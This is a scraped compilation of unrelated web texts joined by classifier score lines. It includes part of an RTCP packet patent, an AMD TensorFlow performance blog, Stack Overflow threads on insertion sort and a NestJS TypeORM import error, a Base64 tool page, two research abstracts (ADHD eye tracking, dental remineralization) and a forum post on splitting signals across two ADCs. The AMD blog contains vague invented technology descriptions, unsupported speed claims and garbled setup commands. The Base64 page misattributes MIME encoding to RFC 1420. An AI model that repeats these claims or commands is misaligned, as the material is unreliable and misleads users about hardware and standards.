non-compound/individual RTCP packets that would be sent as compound packet) are sent together (i.e., stacked) as a semi-compound RTCP packet. FIG. 8 illustrates a method to process semi-compound RTCP packets, in accordance with the fourth embodiment of the present invention. At step 800, the method determines that the bearer allows sending more than just a single individual non-compound RTCP packet, but the bearer does not allow sending the full compound RTCP packet. At step 810, the method configures the RTCP packets as semi-compound RTCP packets including at least two non-compound/individual RTCP packets (but less than all the non-compound/individual RTCP packets that would be sent as compound packet). At step 820, the method transmits the semi-compound RTCP packets, where at least two non-compound/individual RTCP packets (but less than all the non-compound/individual RTCP packets that would be sent as compound packet) are sent together (i.e., stacked) for each semi-compound RTCP packet. It is to be understood that in the embodiments of the present invention, the steps are performed in the sequence and manner as shown although the order of some steps and the like may be changed without departing from the spirit and scope of the present invention. In addition, the methods described in FIGS. 5-8 may be repeated as many times as needed. Embodiments of the present invention can provide a guarantee that RTCP compound packets are limited in size, and that their size does not produce delays or losses because of the RLC layer operations. For efficiency reasons, this maximum size can be clearly defined. If the maximum size is defined, the impact of RTCP traffic on RTP traffic (delay or losses) can be better estimated and managed in a session. Typically in AMR multi-rate operations, the bearer is dimensioned to carry the highest AMR mode in a session. With this reasonable assumption and with the goal of minimizing the size of RTCP compound packets, their size may be limited to be, for instance, three times the size of RTP packets used (in this case, the highest of the AMR modes used in the session gives the best estimate). Note that two times is a common case in practical scenarios, although the present invention is not limited to this scenario. This restriction limits the delay/packet loss effect of RTCP over RTP traffic. If the minimum RTCP transmission interval is very large (for instance, ten seconds), then more weight may be placed on the non-compound RTCP packets. It is possible that only one compound RTCP packet is used at the beginning during a session, and after that, very rarely. This setting could be justified by the fact that a terminal implementation might wish to almost eliminate the use of compound RTCP packets, in order to reduce to zero the potential losses derived by RTCP compound packets. In this case, there may be a problem of conveying the same information that RTCP compound packets are carrying, but using non-compound packets. Non-compound packets can be used not only to carry APP packets for adaptation, but also SR, RR and SDES packets. No doubt that the information contained in these packets is very useful to a session participant. SR, RR and SDES packets may be carried over non-compound RTCP packets for example in a cyclic way. In practice, a compound RTCP packet may be fragmented and sent over several non-compound RTCP packets. If space allows (within the limits of RTCP packets) more than one non-compound RTCP packet can be stacked to form a semi-compound RTCP packet (smaller than a compound RTCP packet), to increase efficiency. Sending SR, RR and SDES packets over non-compound RTCP packets allows conveying useful feedback that would be otherwise not carried, or carried much more infrequently and avoid losses derived by the usage of RTCP compound packets. According to one embodiment of the invention, the method steps performed in FIGS. 5-8 may be performed by a computer program product embodied on a computer-readable medium, encoding instructions for performing at least the method described in FIGS. 5-8. The computer program product can be embodied on a computer readable medium. The computer program product can include encoded instructions for processing location configuration protocol determination flow, which may also be stored on the computer readable medium. The computer program product can be implemented in hardware, software, or a hybrid implementation. The computer program product can be composed of modules that are in operative communication with one another, and which are designed to pass information or instructions to a communications device such as a user equipment or network node. The computer program product can be configured to operate on a general purpose computer or an application specific integrated circuit (ASIC). Certain embodiments of the present invention offers advantages such as resolving the problem of an excessive length of compound RTCP packets, by fragmenting each compound RTCP packet in smaller non-compound packets and sending it spaced over time, which reduces or eliminates the problem of the packet losses generated by long RTCP packets. Embodiments of the present invention can guarantee that RTCP non-compound packets provide an equivalent functionality as the RTCP compound packets, because they provide the same information to the receiver (SR, RR, SDES, etc.), and the receiver is not lacking of any feedback information. The information may be provided spread in time, and not in a single compound packet. The embodiments of the present invention can also remove or minimize the impact of the RTCP traffic over the RTP traffic, in terms of additional delay or losses. The embodiments of the present invention also allow, at least, the receiver to verify that its feedback sent over RTCP non-compound packets has really been received. Certain embodiments of the present invention further allow, at least, making maximum usage of the bearer capabilities. For example, if there is enough space (in a RLC frame) to send two RTCP compound packets together (but not enough space to send the full RTCP compound packet made of three non-compound packets), then these are sent as semi-compound RTCP packet. In accordance with an embodiment of the present invention, the apparatus may include any type of controller, mobile or non-mobile network element including, but not limited to, a processor, a mobile station, a laptop, a user equipment, a wireless transmit/receive unit, a fixed or mobile subscriber unit, a mobile telephone, a computer (fixed or portable), a pager, a personal data assistant or organizer, or any other type of network element capable of operating in a wireless environment or having networking capabilities. In addition, while the term data has been used in the description of the present invention, the invention has import to many types of network data. For purposes of this invention, the term data includes packet, cell, frame, datagram, bridge protocol data unit packet, packet data and any equivalents thereof. The many features and advantages of the invention are apparent from the detailed specification and, thus, it is intended by the appended claims to cover all such features and advantages of the invention which fall within the spirit and scope of the invention. Further, since numerous modifications and changes will readily occur to those skilled in the art, it is not desired to limit the invention to the exact construction and step illustrated and described, and accordingly all suitable modifications and equivalents may be resorted to, falling within the scope of the invention. Patent Citations Cited PatentFiling datePublication dateApplicantTitle US77561082 Nov 200413 Jul 2010Nokia CorporationTransmission of voice over a network US20040165527 *5 Dec 200326 Aug 2004Xiaoyuan GuControl traffic compression method US20060050705 *5 Aug 20059 Mar 2006Lg Electronics Inc.Distinguishing between protocol packets in a wireless communication system US20060069799 *17 Oct 200330 Mar 2006Frank HundscheidtReporting for multi-user services in wireless networks US20060187927 *6 Mar 200624 Aug 2006Melampy Patrick JSystem and method for providing rapid rerouting of real-time multi-media flows US20070153914 *29 Dec 20055 Jul 2007Nokia CorporationTune in time reduction US20100020713 *14 Dec 200728 Jan 2010Tomas FrankkilaDividing rtcp bandwidth between compound and non-compound rtcp packets Non-Patent Citations Reference 13GPP, Multimedia Telephony; media handling and interaction, Release 7, TS 26.114, Mar. 2007. 2Change Request on "addition of non-compound RTCP", Ericsson, Tdoc S4-070264, 3GPP SA4#43, Rennes, France, Apr. 23-27, 2007. 3Handling of variable data rates for conversational IMS, Siemens, Tdoc R2-030237, 3GPP RAN2#34, Sophia Antipolis, France, Feb. 17-21, 2003. 4I. Johansson, M. Westerlund, Support for non-compound RTCP in RTCP AVPF profile, opportunities and consequences, IETF draft, draft-johansson-avt-rtcp-avpf-non-compound-01, Mar. 5, 2007. 5International Search Report and Written Opinion of the International Searching Authority for PCT Application No. PCT/IB2008/000988, dated Apr. 24, 2009, 19 pages. 6Non-compound RTCP in MTSI, Ericsson, Tdoc S4-070263, 3GPP SA4#43, Rennes, France, Apr. 23-27, 2007. 7Ott et al., "Extended RTP Profile for Real-Time Transport Control Protocol (RTCP) Based Feeback (RTP/AVPF)" IETF Standard Internet Engineering Task Force, IETF, CH. Jul. 1, 2006. 8RAB support for IMS, 3GPP TR 25.xxx V0.0.0 (Nov. 2003) 3rd Generation Partnership Project; Technical Specification Group Radio Access Network; RAB support for IMS (Release 6) (13 Pages). 9Radio Link Control (RLC) Protocol Specification, 3GPP TS 25.322 (Release 7), Mar. 2006. 10RTCP Handling: Separation or Multiplexing, Alcatel, Tdoc S2-033598, 3GPP SA2#35, Bangkok, Thailand, Oct. 27-21, 2003. 11RTCP optimization usage for VoIMS, Nokia, Tdoc 54-030770, 3GPP SA4#29 meeting, Tampere, Finland, Nov. 24-28, 2003. 12RTCP Removal, Three, Tdoc S2-033136, 3GPP SA2#34, Brussels, Belgium, Aug. 25-29, 2003. 13RTP-RTCP Multiplexing, Three, Tdoc S2-033127, 3GPP SA2#34, Brussels, Belgium, Aug. 25-29, 2003. 14RTP-RTCP Separation, Three, Tdoc S2-033128, 3GPP SA2#34, Brussels, Belgium, Aug. 25-29, 2003. 15Schulzrinne etl al., "RTP: A Transport Protocol for Real-Time Applications", IETF RFC 3550, Jul. 2003. 16Westerlund et al., "Support for non-compound RTCP in RTCP AVPF Profile, Opportunities and Consequences" IETF Standard Working Draft, Internet Engineering Task Force, IETF, Ch No. 1, Mar. 5, 2007. Classifications U.S. Classification370/389, 370/252, 709/232, 370/392, 370/465 International ClassificationH04L12/56 Cooperative ClassificationH04L65/1016, H04L65/80, H04L65/608 Legal Events DateCodeEventDescription 23 Oct 2009ASAssignment Owner name: NOKIA CORPORATION,FINLAND Free format text: ASSIGNMENT OF ASSIGNORS INTEREST;ASSIGNOR:CURCIO, IGOR DANILO DIEGO;REEL/FRAME:023414/0104 Effective date: 20091022 Owner name: NOKIA CORPORATION, FINLAND Free format text: ASSIGNMENT OF ASSIGNORS INTEREST;ASSIGNOR:CURCIO, IGOR DANILO DIEGO;REEL/FRAME:023414/0104 Effective date: 20091022 30 Apr 2013CCCertificate of correction 1 May 2015ASAssignment Owner name: NOKIA TECHNOLOGIES OY, FINLAND Free format text: ASSIGNMENT OF ASSIGNORS INTEREST;ASSIGNOR:NOKIA CORPORATION;REEL/FRAME:035544/0616 Effective date: 20150116 25 Aug 2016FPAYFee payment Year of fee payment: 4
__label__pos
0.767841
AMD Deep Learning TensorFlow Performance AMD provides a powerful platform for training and deploying Deep Learning models with TensorFlow. This blog describes the performance of AMD hardware for TensorFlow. Checkout this video: Introduction to AMD Deep Learning and TensorFlow Performance AMD deep learning is a new technology that allows for more efficient and effective training of deep learning models. In this article, we will explore what AMD deep learning is, how it works, and how it can be used to improve TensorFlow performance. AMD deep learning technology is based on two main concepts: collaboration and coordination. By collaborating with other devices, AMD deep learning-enabled devices can share resources and knowledge, which leads to more efficient training. Coordination between devices is also important, as it allows for the distribution of training tasks across multiple devices. This leads to shorter training times and less overall energy consumption. In terms of TensorFlow performance, AMD deep learning-enabled devices can provide up to 2x faster performance than traditional GPUs. This means that you can train your models faster and use less energy in the process. Additionally, AMD deep learning-enabled devices offer better scalability than traditional GPUs, meaning that you can use more devices in parallel without sacrificing performance. How AMD’s Deep Learning Solution Performs AMD has released a new deep learning solution that offers excellent performance for training and inference workloads. The company claims that its new solution is up to twice as fast as NVIDIA’s Tesla V100 in some cases, making it the fastest deep learning solution on the market. In this article, we will take a look at how AMD’s deep learning solution performs in comparison to NVIDIA’s Tesla V100. We will also compare its performance to other deep learning solutions from major companies such as Google, Facebook, and Microsoft. Why AMD’s Deep Learning Solution is Ideal for TensorFlow When it comes to deep learning, training speed is critical. The faster you can train your models, the more experiments you can run and the better your results will be. AMD’s deep learning solution is designed for speed, offering up to 2X the performance of other solutions on key deep learning workloads like TensorFlow. But speed isn’t the only important factor. Deep learning models are getting increasingly complex, so you need a solution that can handle large models without breaking a sweat. AMD’s deep learning solution is optimized for size as well as speed, offering up to 4X the memory bandwidth of other solutions. This means you can train larger, more complex models without sacrificing performance. If you’re looking for a deep learning solution that offers the best of both worlds – speed and scalability – AMD is the way to go. What is TensorFlow and What Can it do? TensorFlow is a powerful open-source software library for data analysis and machine learning. Originally developed by Google Brain team researchers, TensorFlow is widely used by leading tech companies, including Instagram, Dropbox, Airbnb, and Samsung. TensorFlow allows developers to build and train sophisticated machine learning models to improve the performance of their products and services. TensorFlow Basics TensorFlow is one of the most popular deep learning frameworks available today. Created by Google, TensorFlow allows developers to create sophisticated machine learning and deep learning models quickly and easily. While TensorFlow can be used for a variety of tasks, it is most commonly used for image recognition and classification. AMD GPUs are well-suited for deep learning tasks such as image recognition and classification. In fact, AMD GPUs offer up to twice the deep learning performance of NVIDIA GPUs*. In this article, we will show you how to get started with TensorFlow on AMD GPUs. *Based on 3rd party testing https://www.amd.com/en/technologies/tensorflow TensorFlow on AMD GPUs TensorFlow is a powerful open-source software library for data analysis and machine learning. AMD GPUs are capable of delivering excellent performance for TensorFlow workloads. In this guide, we will show you how to get the most out of your AMD GPU when running TensorFlow. We will cover the following topics: -Installing TensorFlow on AMD GPUs -Configuring TensorFlow for optimal performance on AMD GPUs -Running TensorFlow workloads on AMD GPUs TensorFlow Performance on AMD GPUs TensorFlow is a popular deep learning framework that can be used to train machine learning models on AMD GPUs. In this article, we’ll take a look at the performance of TensorFlow on AMD GPUs and compare it to other popular deep learning frameworks. We’ll start by looking at the performance of TensorFlow on different types of AMD GPUs. We’ll then compare the performance of TensorFlow on AMD GPUs to the performance of other popular deep learning frameworks, such as Caffe2 and PyTorch. From our results, we can see that TensorFlow performs well on all types of AMD GPUs. In particular, TensorFlow shows good performance on the Vega 64 and Vega Frontier Edition GPUs. TensorFlow also compares favorably to other deep learning frameworks, such as Caffe2 and PyTorch. Conclusion In conclusion, AMD’s new 7nm Vega GPU architecture offers excellent deep learning TensorFlow performance compared to competing NVIDIA GPUs. For example, the Radeon VII offers nearly double the performance of the NVIDIA RTX 2080 Ti at a fraction of the cost. This makes AMD’s 7nm Vega GPU architecture a great choice for Deep Learning TensorFlow applications. References Most of the popular deep learning frameworks have bindings for AMD GPUs. This means that you can train your models using AMD GPUs and reap the benefits of faster performance. However, there are some things to keep in mind when using AMD GPUs for deep learning. In this article, we will go over some tips to get the most out of your AMD GPU when training deep learning models in TensorFlow. Before we get started, let’s take a look at the hardware that we’ll be using. For this article, we will be using an AMD Radeon VII 16GB GPU. This is a high-end gaming GPU that is also good for deep learning. It has plenty of memory and powerful compute capabilities. Now that we have a good idea of the hardware we’ll be using, let’s get started with the tips! 1. Use a recent version of TensorFlow: TensorFlow 1.12 or newer is needed for AMDGPU support. You can installTensorFlow 1.12 from pip like this: pip install tensorflow==1.12 . Alternatively, you can use the pre-compiled binaries from the TensorFlow website . Be sure to select the version that matches your system (we’ll be using CPU-only for this example). 2. Set up your environment: Before you can use your AMD GPU with TensorFlow, you need to set up some environment variables . The easiest way to do this is to add these lines to your ~/.bashrc file: export TF_NEED_ROCM=1 export PATH=/opt/rocm/bin:$PATH 3. Install ROCm: ROCm stands for Radeon Open Compute Platform . It is a set of open source tools and drivers for Radeon GPUs. You can install it from their website . Be sure to select the version that matches your system (we’ll be using ROCm 2.0). 4. Run TensorFlow: Now you’re ready to run TensorFlow! Just type python3 and CUDA_VISIBLE_DEVICES=0 tf_gpu into your terminal . You should see something like this: 5Python 3.6 Similar Posts
__label__pos
0.946565
Take the 2-minute tour × Stack Overflow is a question and answer site for professional and enthusiast programmers. It's 100% free, no registration required. i know insertion sort isn't that great...but even still...what are two more simple improvements that could be made to the sort below? public static void insertion_sort_with_moves(int[] arr){ for (int i = 1; i <= arr.length; i++){ int v = arr[i-1]; int j = i-1; for (/*declared j outside loop*/; j > 0; j--) { //compswap(a[j-1], a[j]); if (v < arr[j-1]) arr[j] = arr[j-1]; else break; } arr[j] = v; } } share|improve this question 1   Proving its correctness is very useful. So is making it generic. –  larsmans Feb 23 '11 at 18:50 3   Is this homework? –  corsiKa Feb 23 '11 at 18:51 10   Why 2 improvements? Why not 1 or 3? –  jzd Feb 23 '11 at 18:51      There is no reason to declare j outside the for; it could be done like 'for (int j = i - 1; …)' instead. –  Haakon Feb 23 '11 at 18:53      Because it's Java, any variables that are not going to change after being declared in the loop could be declared final. This allows the compiler to make certain optimizations it wouldn't be able to otherwise. –  corsiKa Feb 23 '11 at 18:54 3 Answers 3 up vote 1 down vote accepted A few micro-optimizations are: 1,2,3) int len = arr.length; ... for (int i = 0; i < len; ++i){ int v = arr[i]; int j = i; Saves you from computing i-1 two times and ++i is faster than i++. Not sure about the length thing (could save the offset addition when accessing a class member). 4,5) for (/*declared j outside loop*/; j != 0; --j) { j!=0 should be faster than j>0 (really don't expect much) and --j is faster than j--. Well most of them may be platform dependent and may make no difference at all. share|improve this answer One thing that comes to mind is that you could use a binary search on the sorted part of array to find where it belongs and use System.arraycopy to move the subarray over by one more efficiently than iterating through. You're still O(n^2) but on large arrays it will be a small improvement. Another is to declare any variables that won't change as final to allow for compiler optimization (as I noted in my comment.) share|improve this answer Updated based on comments: Some improvements to help readability: 1. Don't use underscores in your method names. Use camel case instead. 2. Consider curly braces around if/else statements to make them easier to read or at least put in more new lines. 3. Remove code that is commented it out if it is not needed. 4. Consider removing comments that explain "what" instead of "why". 5. Try to avoid one character variables especially when you have several in the same scope. 6. You might be able to make use of a for each loop rather than having to declare and access the v variable. (Would still need the current index, but other changes might allow this) share|improve this answer      Does that really improve the sort itself? I'm pretty sure he's looking for code improvements, even if it doesn't explicitly say that. –  corsiKa Feb 23 '11 at 18:55      @glowcoder, yes the more readable it is the more potential for bugs to be found and improvements to be identified. –  jzd Feb 23 '11 at 18:56      Extra curly braces are not an improvement. Proper indentation is. –  larsmans Feb 23 '11 at 18:59      @jzd Those are a matter of style, not performance. In fact, it is very common to have a rule that says "If statements must have curly braces, even for one liners, unless the entire statement is on the same line as the if statement." And while almost every Java developer uses camelCase instead of underscores, has 0 impact on finding bugs in the method. –  corsiKa Feb 23 '11 at 19:00      Also, I should point out i'm not the downvoter. I do find your statements potentially useful, just not to answering the question at hand :-) –  corsiKa Feb 23 '11 at 19:04 Your Answer   discard By posting your answer, you agree to the privacy policy and terms of service. Not the answer you're looking for? Browse other questions tagged or ask your own question.
__label__pos
0.583562
Encode a string as base64: Base64 (MIME) Encode Tool Use this free tool to turn binary data into text (encode) or text into binary (decode). To allow binary data to be transmitted with textual data it must be encoded. An example of this is an attachment in an email. This is done via the MIME implementation of Base64. The MIME implementation uses the characters A-Z, a-z, and 0-9 for the initial 62 values that it can use to encode data. For example, the text: Dan's Tools are cool! Would be encoded as... RGFuJ3MgVG9vbHMgYXJlIGNvb2wh What is Base64 encoding? The term Base 64 is generic, and there are many implementations. MIME, which stands for Multi-Purpose Internet Mail Extensions, is the most common that is seen today. It is used to transmit attachments via email over the Simple Mail Transfer Protocol (SMTP). Other examples of Base64 encoding are Radix-64 and YUI's Y64. Encoding data in Base64 results in it taking up roughly 33% more space than the original data. MIME Base64 encoding is the most common, and is based on the RFC 1420 specification. It also uses a = character at the end of a string to signify whether the last character is a single or double byte. When and why would you use Base64 encoding? You should use Base64 whenever you intend to transmit binary data in a textual format. Code Examples LanguageEncodeDecodeNotes PHPbase64_encode($string);base64_decode($string); Perlencode_base64($string);decode_base64($string);Requires use MIME::Base64; C#System.Convert.ToBase64String(System.Text.Encoding.UTF8.GetBytes(plainTextBytes));System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(base64EncodedData)); JavaBase64.encodeBase64(string);Base64.decodeBase64(string);Requires import org.apache.commons.codec.binary.Base64; JavaScriptbtoa(string);atob(string);<= IE9 is unsupported RubyBase64.encode64('string')Base64.decode64(enc)Requires require "base64" External Links • More information about Base64 (Wikipedia) Related Tools: Base64 Decode HTML Entities Escape URL Encode/Decode
__label__pos
0.985464
The Collection System of Eye Movements for Psychological Disorder 1Dong Hyun Kim, Hyun Woo Lee, Young Sil Lee 149 Views 49 Downloads Abstract: ADHD is one of the psychological disorder of children and the national health insurance of korea reported the 55,000 of infants and children have ADHD in 2014. Since the features of ADHD lead to various side effects, such as the learning disability, memory ability, it is required to diagnose ADHD in childhood and start the treatment of ADHD. However, it is difficult to diagnose ADHD in childhood if the child does not show the hyperactivity symptom. Also, since the questions are too professional or the diagnosis test requires the cognitive and activity abilities, the children have the difficulties to understand the questions and show the proper response. To solve this problem, we propose the collection system of eye movements for ADHD diagnosis. The proposed system displays four types of korean texts: a letter, a word, a sentence and a paragraph. When a subject watches the sample texts, the system collects the coordinates and time of eye movements and transforms them into gaze pattern data for ADHD diagnosis. The benefit of the proposed system is that the physical interventions for the subject are not required to collect the diagnosis data during the assessment for ADHD. Keywords: psychological disorder, ADHD, eye movements, eye tracker, machine learning Paper Details Month3 Year2020 Volume24 IssueIssue 7 Pages2068-2075
__label__pos
0.953077
We are using cookies to implement functions like login, shopping cart or language selection for this website. Furthermore we use Google Analytics to create anonymized statistical reports of the usage which creates Cookies too. You will find more information in our privacy policy. OK, I agree I do not want Google Analytics-Cookies The Journal of Adhesive Dentistry Login: username: password: Plattform: Forgotten password? Registration J Adhes Dent 21 (2019), No. 3     7. June 2019 J Adhes Dent 21 (2019), No. 3  (07.06.2019) Page 219-228, doi:10.3290/j.jad.a42305, PubMed:31165104 Remineralization Potential of Calcium and Phosphate-based Agents and Their Effects on Bonding of Orthodontic Brackets Uy, Erika / Ekambaram, Manikandan / Lee, Gillian Hiu Man / Yiu, Cynthia Kar Yung Purpose: To compare the remineralization potential of Clinpro Tooth Crème (CTC C, 3M Oral Care) containing functionalized tricalcium phosphate (fTCP), Tooth Mousse (TM, GC) containing casein phosphopeptide amorphous calcium phosphate (CPP-ACP), and Tooth Mousse Plus (TMP, GC) containing casein phosphopeptide amorphous calcium phosphate with fluoride (CPP-ACPF) and their effects on the shear bond strength (SBS) of orthodontic brackets to enamel. Materials and Methods: In Part I of the study, 51 premolars were divided into 3 groups: 1: fTCP; 2: CPP-ACP; 3: CPP-ACPF. Artificial carious lesions were created and immersed in remineralizing solution for 30 days. Specimens were evaluated using Knoop microhardness and transverse microradiography. The percentage of surface hardness recovery (%SHR), change in lesion depth (∆LD), and mineral loss (∆∆Z) were analyzed using one-way ANOVA. In Part II of the study, 80 premolars were divided into 5 groups: A: brackets bonded to sound enamel; B: brackets bonded to demineralized enamel (DE); C-E: demineralized enamel immersed in remineralizing solution containing fTCP (group C), CPP-ACP (group D), or CPP-ACPF (group E) before bracket bonding. The SBS of half of the specimens were tested immediately, while the other half were tested after thermocycling. Data were analyzed using two-way ANOVA. Results: TMP showed significantly higher %SHR, ∆LD and ∆∆Z compared to the other groups (p < 0.05). Both control and TMP had the highest SBSs and demineralized enamel the lowest, irrespective of thermocycling. No significant difference in SBS was found between TM and TMP after thermocycling. Conclusions: Tooth Mousse Plus achieved significant remineralization of artificial enamel carious lesions without adverse effect on shear bond strength of orthodontic brackets to remineralized enamel. Keywords: calcium and phosphate-based agents, enamel bonding, orthodontic brackets, remineralization
__label__pos
0.638351
Welcome, Guest Username: Password: Remember me TOPIC: Double Span and Digitize Signals Using Two ADCs Double Span and Digitize Signals Using Two ADCs 6 years 6 months ago #27 • JR • JR's Avatar • OFFLINE • Senior Member • Posts: 77 • Thank you received: 31 • Karma: 6 I copy/paste here the article by Mike McGlinchy in Electronic Design because in that website the images are not showing properly. pedalSHIELD is compatible with the arrangement described by M. McGlinchy by placing the jumper1: By splitting the input signal into positive and negative portions and digitizing separately, this circuit allows a microcontroller’s unipolar ADC to handle bipolar signals and double its input range without compromising resolution. 63383-fig1.jpg Many microcontrollers (MCUs) incorporate onboard analog-to-digital converters (ADCs), usually with many multiplexed input channels. However, these ADCs are typically unipolar, able to handle only signals that are between the positive and negative reference voltages (+VREF to – VREF) with –VREF usually 0 V. To accommodate negative voltages, then, these ADCs need some form of signal conditioning. The typical approach uses an op-amp dc level shifter that raises the signal by one half of +VREF so the entire analog signal excursion lies within the positive domain where the ADC can handle it. But there are two drawbacks to this approach. One is that shifting the signal cuts the positive headroom in half. Another drawback is the need for additional math firmware to remove the signal shift, which can reduce, perhaps significantly, the overall signal conversion rate. This alternative approach breaks the incoming signal into its positive and negative components and digitizes them independently. It utilizes two of the microcontroller’s ADC channels along with a 4.096-V external voltage reference diode, two Schottky diodes, and both halves of a dual op amp. Considering that the ADC likes a low impedance signal source (typically 10 kΩ, but a lower value is preferable for faster throughput), op amps are usually needed in a design to buffer a high impedance signal or sensor into a low impedance. Therefore, the dual op amp used here cannot really be considered an “extra” part. The design example uses a midrange microcontroller, the PIC16F876 (U3), shown with only the pin connections pertaining to this technique (Fig. 1). The two halves of the op amp form a voltage follower with gain +1 (U1A) attached to the signal input followed by an inverter with gain –1 (U1B). The output of U1A attaches to analog input AN0 (U3, pin 2) through current-limiting resistor R1. Similarly, U1B attaches to AN1 through R4. When VIN is positive—say, +4.00 V—U1A will present +4.00 V to AN0. Meanwhile, U1B will have –4.00 V on its output but the low-voltage-drop Schottky diode clips the negative voltage seen at AN1 (U3, pin 3) to about –0.24 V. Similarly, if VIN is –4.00 V, U1B will present +4.00 V to AN1 while D1 clips the –4.00 V from U1A to about –0.24 V at AN0. Clipping the outputs in this way prevents a signal more negative than –0.30 V from appearing at either ADC input. Too negative a voltage at one input could cause current injection that would alter the other ADC channel’s results. The sample waveforms show a symmetrical 8-V p-p sine wave at VIN with the corresponding signals seen at the two ADC input channels (Fig. 2). The ADC will read any value equal to or below 0 V as zero. 63383-fig2.jpg The firmware to read the input signal must first select ADC channel 0 (AN0) and wait for the acquisition time of 40 µs or so, then trigger the ADC conversion. If the reading is not zero, then VIN is a positive voltage. Because VREF is 4.096 V, or 4 × 1024, the ADC reading is not the actual voltage but the number of 4-mV steps in the signal. If you need an exact voltage rather than a relative value, the firmware must multiply by four before storing the reading in RAM. (Two 8-bit locations will be needed because this is a 10-bit converter.) If the reading for AN0 is zero, the firmware must select ADC channel 1 (AN1) and wait another 40 µs before performing a second conversion. If this result is not zero (for example, it’s 1.50 V), then VIN is negative (–1.50 V) and the firmware should convert the reading to a negative number before storing. If both AN0 and AN1 read as zero, then VIN = 0 V. The circuit shown can digitize signals from +4.092 V to –4.092 V (8.184 V p-p) and can handle 10 V p-p if +VREF is set to +5 V (although converting the reading to the actual voltage becomes more complicated). The approach, then, doubles the ADC’s normal span while maintaining the same resolution. Op amps with rail-to-rail inputs and outputs as well as low input-offset voltages will work best in this design. If speed is an issue, you can use faster op amps and a microcontroller with faster ADCs, playing the usual speed, accuracy, and power-consumption tradeoffs. I included this jumper in the design because it is easy and provides extra features at zero cost. I have tried this configuration and works but there is crossover distortion which actually sounds like a subtle overdrive. In the future I will investigate more possibilities of this arrange. keep it simple Last Edit: 6 years 6 months ago by JR. The administrator has disabled public write access. Time to create page: 0.201 seconds Powered by Kunena Forum Joomla SEF URLs by Artio
__label__pos
0.690609
139 Started new project with 'nest new' command. Works fine until I add entity file to it. Got following error: import { Entity, Column, PrimaryGeneratedColumn } from 'typeorm'; ^^^^^^ SyntaxError: Cannot use import statement outside a module What do I miss? Adding Entity to Module: import { Module } from '@nestjs/common'; import { BooksController } from './books.controller'; import { BooksService } from './books.service'; import { BookEntity } from './book.entity'; import { TypeOrmModule } from '@nestjs/typeorm'; @Module({ imports: [TypeOrmModule.forFeature([BookEntity])], controllers: [BooksController], providers: [BooksService], }) export class BooksModule {} app.module.ts: import { Module } from '@nestjs/common'; import { AppController } from './app.controller'; import { AppService } from './app.service'; import { TypeOrmModule } from '@nestjs/typeorm'; import { Connection } from 'typeorm'; import { BooksModule } from './books/books.module'; @Module({ imports: [TypeOrmModule.forRoot()], controllers: [AppController], providers: [AppService], }) export class AppModule {} 4 • import { Module } from '@nestjs/common'; – Preston Dec 21, 2019 at 15:37 • @Preston care to elaborate on what you mean? Do you have to create a module for commonly shared files? Dec 21, 2019 at 22:35 • Are you getting the error from your linter or from a compilation? Where do you have this new file? Is it in your src directory? If you're using TypeORM, can you show your TypeOrmModule import in the AppModule's imports array? There may be something wrong with the configuration we can't see Dec 23, 2019 at 16:25 • updated post with entity import info – Anton Dec 24, 2019 at 12:28 29 Answers 29 221 My assumption is that you have a TypeormModule configuration with an entities property that looks like this: entities: ['src/**/*.entity.{ts,js}'] or like entities: ['../**/*.entity.{ts,js}'] The error you are getting is because you are attempting to import a ts file in a js context. So long as you aren't using webpack you can use this instead so that you get the correct files entities: [join(__dirname, '**', '*.entity.{ts,js}')] where join is imported from the path module. Now __dirname will resolve to src or dist and then find the expected ts or js file respectively. let me know if there is still an issue going on. EDIT 1/10/2020 The above assumes the configuration is done is a javascript compatible file (.js or in the TypeormModule.forRoot() passed parameters). If you are using an ormconfig.json instead, you should use entities: ["dist/**/*.entity.js"] so that you are using the compiled js files and have no chance to use the ts files in your code. Or use autoLoadEntities: true, 6 • 109 But this is a total mess. A typescript ORM that does not accept typescript for the migrations... – Matteo Feb 3, 2020 at 6:00 • 3 deno is the only native typescript code runner. TypeORM, while it uses Typescript, still works with Node and the JavaScript runtime. Maybe improvements can be made to accept ts files and compile them into JavaScript under the hood, then delete them so the end user doesn't see them, but that would need to be brought up as an issue on the TypeORM git repository Feb 3, 2020 at 6:40 • 2 actually full line must be "entities": ["dist/**/*.entity.js"], because of json syntax. May 9, 2020 at 17:12 • 21 I absolutely agree that having to reach into the transpiled JS for all this mess to work is a joke. – Patrick Aug 22, 2020 at 12:34 • 3 The Issue #4283 on Github explains in details why JavaScript should be used to read entities from Dist folder. This is the magic line I changed in ormconfig.js in the root folder, you too can try and see. entities: ['dist/**/*.entity.js'] is the solution. – Agent May 20, 2021 at 11:49 62 In the TypeORM documentation, i found a specific section for Typescript. This section says: Install ts-node globally: npm install -g ts-node Add typeorm command under scripts section in package.json "scripts" { ... "typeorm": "ts-node -r tsconfig-paths/register ./node_modules/typeorm/cli.js" } Then you may run the command like this: npm run typeorm migration:run If you need to pass parameter with dash to npm script, you will need to add them after --. For example, if you need to generate, the command is like this: npm run typeorm migration:generate -- -n migrationNameHere This works with my file config: { "type": "postgres", "host": "yourhost", "port": 5423, "username": "username", "password": "password", "database": "your_db", "synchronize": true, "entities": [ "src/modules/**/*.entity.{ts,js}" ], "migrations": [ "src/migrations/**/*.{ts,js}" ], "cli": { "entitiesDir": "src/modules", "migrationsDir": "src/migrations" } } Then you can run the generate command. 3 • 22.04.23 I had to run this: npm run typeorm migration:generate -- migrationNameHere -d ./src/data-source.ts Apr 22, 2023 at 15:46 • That's really awful. Who has a javascript exclusive tool? – Alper Dec 15, 2023 at 15:54 • I get RangeError: Maximum call stack size exceeded this way. Cant figure out to make it work. – Bulat Feb 20 at 11:22 25 As Jay McDoniel explained in his answer, the problem seems to be the pattern matching of entity files in ormconfig.json file: Probably a typescript file (module) is imported from a javascript file (presumably a previously transpiled typescript file). It should be sufficient to remove an existing ts glob pattern in the ormconfig.json, so that TypeORM will only load javascript files. The path to the entity files should be relative to the working directory where node is executed. "entities" : [ "dist/entity/**/*.js" ], "migrations" : [ "dist/migration/**/*.js" ], "subscribers": [ "dist/subscriber/**/*.js" ], 2 • The src should probably be changed to dist as that's where the runnable code is after being transpiled to javascript. Jan 10, 2020 at 18:48 • It took me a while: During runtime, code will be run off the 'dist' (Distribution) folder. And the *.entity.ts file containing the database model, will be translated to .js file by TypeOrm. Hence - entities entry should point to *.entity.js under the 'dist' folder. Thank you all. Save my day. – Yazid May 14, 2020 at 12:53 10 Defining the entities property in ormconfig.json as mentioned in the official documentation resolved this issue for me. // This is your ormconfig.json file ... "entities": ["dist/**/*.entity{.ts,.js}"] ... 8 I changed in tsconfig.json file next: "module": "es6" To: "module": "commonjs", It 